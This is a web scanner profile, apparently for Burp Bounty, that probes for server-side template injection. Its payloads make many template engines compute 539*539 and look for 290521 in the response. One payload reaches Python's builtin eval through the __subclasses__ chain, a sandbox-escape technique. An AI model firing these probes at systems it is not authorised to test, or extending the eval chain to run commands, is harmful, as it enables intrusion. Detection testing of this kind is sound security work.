[
  {
    "ProfileName": "SSTI - Multiply",
    "Name": "",
    "Enabled": false,
    "Scanner": 1,
    "Author": "",
    "Payloads": [
      "true,{{ 539 * 539 }}",
      "true,{{ \u0027\u0027.__class__.__mro__[1].__subclasses__()[0].__init__.__globals__[\u0027__builtins__\u0027][\u0027eval\u0027](\u0027539*539\u0027) }}",
      "true,\u003c% import math %\u003e\u003c%\u003d 539 * 539 %\u003e",
      "true,{% set x \u003d 539 %}{{ x * x }}",
      "true,{{ 539|multiply(539) }}",
      "true,{php}echo 539 * 539;{/php}",
      "true,${539 * 539}",
      "true,#set($x \u003d 539) #set($y \u003d $x * $x) $y",
      "true,${T(java.lang.Math).multiplyExact(539, 539)}",
      "true,{% set x \u003d 539 %}{{ x * 539 }}",
      "true,\u003c%\u003d 539 * 539 %\u003e",
      "true,\u003d 539 * 539",
      "true,\u003c%- 539 * 539 %\u003e",
      "true,- var x \u003d 539; - var y \u003d x * x; y",
      "true,\u003c%\u003d 539 * 539 %\u003e",
      "true,@scala.math.BigInt(539) * 539",
      "true,\u003c% 539 * 539 %\u003e",
      "true,{{ 539 * 539 }}",
      "true,{{ 539 | times: 539 }}"
    ],
    "Encoder": [
      "URL-encode key characters"
    ],
    "UrlEncode": false,
    "CharsToUrlEncode": "",
    "Grep": [
      "true,,290521"
    ],
    "Tags": [
      "All"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "",
    "TimeOut2": "",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "MatchType": 1,
    "Scope": 0,
    "RedirType": 0,
    "MaxRedir": 0,
    "payloadPosition": 2,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "SSTI - Multiply",
    "IssueSeverity": "High",
    "IssueConfidence": "Certain",
    "IssueDetail": "",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      18,
      65,
      32,
      36,
      7,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      127,
      65,
      32,
      36,
      7,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      127
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false
  }
]